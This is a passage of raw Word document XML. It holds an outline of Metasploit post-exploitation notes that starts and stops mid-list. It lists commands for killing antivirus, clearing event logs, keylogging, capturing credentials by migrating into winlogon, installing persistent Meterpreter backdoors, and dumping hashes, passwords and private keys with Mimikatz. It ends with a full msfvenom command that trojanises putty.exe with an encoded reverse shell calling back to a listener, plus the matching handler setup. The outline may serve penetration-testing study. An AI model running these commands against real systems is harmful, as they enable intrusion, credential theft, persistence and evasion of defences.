        <w:t>GET_LOCAL_SUBNETS – gathers local subnet mask of a victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F57F" w14:textId="5014476C" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GETTELNET – used to enable telnet on the victim if disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504D340" w14:textId="08536F25" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HOSTSEDIT – adds entries to windows host file, as it is the first stop before DNS and if helpful for redirecting traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB8C3A" w14:textId="70520B1C" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>KILLAV – disable most AV programs running as a service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16812217" w14:textId="4514D636" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>REMOTEWINENUM – enumerates system information through wmic on victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AB9F2" w14:textId="6EA3FE5D" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SCRAPER – grabs additional info, including registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24623397" w14:textId="36E767D6" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WINENUM – dumps tokens, hashes, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66873FF3" w14:textId="4CD258C0" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WRITING SCRIPTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA39F3B" w14:textId="2DA09D92" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CUSTOM SCRIPTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9A396" w14:textId="437DE7E2" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>USEFUL API CALLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50359E5F" w14:textId="34BF54DA" w:rsidR="00CB5036" w:rsidRDefault="00CB5036" w:rsidP="00CB5036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>USEFUL FUNCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26EE49" w14:textId="4926F2DD" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>available wmic commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FF4DA" w14:textId="0EAAD4E4" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>change MAC time of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5F389" w14:textId="714FD961" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>check for UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F535467" w14:textId="14D64DF8" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>clear all event logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79E840" w14:textId="2A191FBC" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>execute list of commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E3300A" w14:textId="7907C9CC" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>upload files and executables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5857B" w14:textId="566F5AE4" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>write data to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FED371" w14:textId="5834A739" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MAINTAINING ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700104B" w14:textId="00CABD9C" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD8AE29" w14:textId="300FD98B" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B19874E" w14:textId="6728CE49" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ps </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> migrate &lt;psid&gt; </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237EB291" w14:textId="3C6E5675" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF79121" w14:textId="401B98E5" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5650D" w14:textId="4D605893" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keyscan_dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432EE86" w14:textId="3D9CEDFC" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>migrate to winlogon process to capture credentials of all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862A5C0" w14:textId="743C1855" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E5BAE" w14:textId="582F04D8" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>metsvc backdoor – no authentication required – alter to req auth or filter connections via secondary method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9C3EA" w14:textId="387533CF" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run metsvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03516239" w14:textId="68862675" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E3356" w14:textId="53FC07E8" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Interacting with METSVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C8350A" w14:textId="3686BC77" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8FCDE" w14:textId="20FC40DB" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/metsvc_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850CD0E" w14:textId="246D4439" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Persistent Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDEFABA" w14:textId="2A9F9814" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A0B69" w14:textId="7A7C4D98" w:rsidR="00D43202" w:rsidRDefault="00D43202" w:rsidP="00D43202">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9CC1D" w14:textId="48DCE905" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE43703" w14:textId="50C04308" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD85CB3" w14:textId="3635FFA0" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C6761" w14:textId="3020F45D" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B67A0" w14:textId="749004D5" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541659D0" w14:textId="502B31BA" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F86A3" w14:textId="79DE95DA" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B27B385" w14:textId="4A8BCCC0" w:rsidR="004B7359" w:rsidRDefault="004B7359" w:rsidP="004B7359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MSF EXTENDED USAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AC567" w14:textId="5E73E49B" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F160260" w14:textId="0BAD84E8" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>following exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0622B" w14:textId="37B9D60E" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55A383" w14:textId="04E77CBF" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA95D4A" w14:textId="1DD00BA9" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C189B" w14:textId="2DFFAF0E" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>load mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EB80FB" w14:textId="115FC757" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00A22B39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mimikatz_command gives full access to all features in mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F1F03" w14:textId="24F3539F" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>samdump::hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBCC10" w14:textId="5217ECE9" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sekurlsa::searchPasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE88041" w14:textId="5E314BA4" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>handle::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FBD81" w14:textId="134082DC" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>list/kill processes and impersonate user tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE8F62C" w14:textId="0E0A00D0" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>handle::list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CDF3B8" w14:textId="5254C572" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>service::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19278C78" w14:textId="0F17478F" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>list, start, stop, remove windows services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20FCFD" w14:textId="5DC3E2D5" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>crypto::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1FACB" w14:textId="1E8A7DF8" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>list and export any certificates and corresponding private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534716B5" w14:textId="7F91A38A" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>::listProviders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F51565" w14:textId="630797F9" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reading Hashes and Passwords From Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E1E06" w14:textId="13C6C0A1" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msv command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8A4E6" w14:textId="113BE20B" w:rsidR="00A22B39" w:rsidRDefault="00A22B39" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kerberos command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B6BAE" w14:textId="07DFC914" w:rsidR="00753AEF" w:rsidRDefault="00753AEF" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Backdooring EXE Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31B981" w14:textId="1E148911" w:rsidR="00753AEF" w:rsidRDefault="00D95715" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use wget to download a legitimate executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB246D" w14:textId="1ED60FAF" w:rsidR="00D95715" w:rsidRDefault="00D95715" w:rsidP="00753AEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use msfvenom to inject a meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="001030C6">
        <w:t>reverse payload into executable, encoding several times and save backdoor into webroot directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15247136" w14:textId="16CEF695" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="001030C6">
        <w:t>msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD67F62" w14:textId="51784CF0" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set up exploit handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C610B" w14:textId="7BA5DD98" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532FF87" w14:textId="3352936B" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE4392" w14:textId="776D0397" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
